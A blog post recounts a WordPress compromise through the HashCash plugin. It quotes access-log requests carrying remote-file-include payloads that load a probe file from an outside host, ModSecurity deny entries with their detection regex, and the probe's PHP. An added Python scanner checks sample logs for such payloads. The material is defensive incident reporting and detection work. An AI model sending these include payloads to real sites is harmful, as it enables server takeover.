Blog was hacked
My blog was hacked by someone from somewhere due to an exploit in the Wordpress plugin HashCash.
The server load surged to 300 and I had to disable Wordpress temporarily and re-install 2.9.1.
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives/242//components/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives//components/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "blog.est.im"] [uri "/components/com_hashcash/server.php"] [unique_id "S0MqF0Wji1IAAEzEq5kAAAAK"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "blog.est.im"] [uri "/archives/242//components/com_hashcash/server.php"] [unique_id "S0MqF0Wji1IAAEpmXZcAAAAJ"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "blog.est.im"] [uri "/archives//components/com_hashcash/server.php"] [unique_id "S0MqF0Wji1IAAEmWRFIAAAAI"]
http://photoworld.com.ua////zfxid1.txt
zfxid.txt (contents of the remote file; it is an include probe: if the response contains "ShiroHige", the remote include executed):
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
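Added example, not part of the original post: a small log scanner that applies the ModSecurity rule 390144 pattern quoted above to Apache combined-format access-log lines, alongside a broader check of our own. The sample log lines are constructed (reserved documentation addresses and an .invalid hostname, not the entries from this blog), and the URIs are URL-decoded before matching on the assumption that the rule's transformations would do the same. The fourth sample line shows a caveat worth knowing: the quoted pattern requires a "?" after the file extension (the trailing "??" attackers append to turn the vulnerable script's path suffix into a harmless query string), so an RFI payload without that suffix slips past it while the broader parameter check still flags it.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines in Apache combined format (not taken
# from a live server). Lines 1-2 mirror the shape of the scanner request in
# the post (line 2 URL-encoded), line 3 is an ordinary page view, line 4 is an
# RFI payload without the trailing "?" that rule 390144 keys on.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2010:04:01:27 -0800] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://example.invalid////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2010:04:01:28 -0800] "GET /archives/242//components/com_hashcash/server.php?mosConfig_absolute_path=http%3A%2F%2Fexample.invalid%2Fzfxid1.txt%3F%3F HTTP/1.1" 503 532 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Jan/2010:04:02:00 -0800] "GET /archives/242 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2010:04:03:10 -0800] "GET /index.php?page=http://example.invalid/shell.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "method uri proto" status size "referer" "ua"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Python rendering of the gotroot rule 390144 pattern quoted in the post's
# ModSecurity log (the log shows doubled backslashes because it prints the
# escaped form from the config file). Note the mandatory "?" after the
# extension: the rule looks for the "??" trick, not for URLs in parameters.
RFI_RULE = re.compile(
    r'=(http|www|ftp):/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|js|html?|tmp|asp)\x20?\?'
)

# Broader check (our own assumption, not the page's rule): any query parameter
# whose value begins with a URL scheme is a remote-include candidate.
PARAM_URL = re.compile(r'[?&][^=&]+=(https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Parse a log line and tag it with both RFI checks run on the decoded URI."""
    rec = parse_line(line)
    if rec is None:
        return None
    # Assumption: match on the URL-decoded URI, as a rule with a urlDecode
    # transformation would; otherwise %3A%2F%2F hides the "://" from the regex.
    uri = unquote(rec["uri"])
    rec["uri_decoded"] = uri
    rec["rule_390144"] = bool(RFI_RULE.search(uri))
    rec["url_in_param"] = bool(PARAM_URL.search(uri))
    return rec


def scan(log_text):
    """Classify every non-empty line of a log; unparsable lines are dropped."""
    return [r for r in (classify(l) for l in log_text.splitlines() if l.strip()) if r]


def suspicious_ips(records):
    """Count flagged requests per client IP (either check firing counts)."""
    return Counter(r["ip"] for r in records if r["rule_390144"] or r["url_in_param"])


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        flags = []
        if r["rule_390144"]:
            flags.append("rule390144")
        if r["url_in_param"]:
            flags.append("url-in-param")
        print(r["ip"], r["status"], ",".join(flags) or "-", r["uri_decoded"])
    print(suspicious_ips(scan(SAMPLE_LOG)))
```

Run it as a script to see each line with its flags; in practice you would feed it `access.log` and feed `suspicious_ips` into a block list or alert. The divergence between the two checks on the last sample line is the point: a signature keyed on one scanner's habit (the "??" suffix) is narrower than the class of attack it is named after.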
When upgrading to Wordpress 2.9.1 I lost some of my modifications to Wordpress, and I had to type them letter by letter again in a slow SSH terminal. Fuck!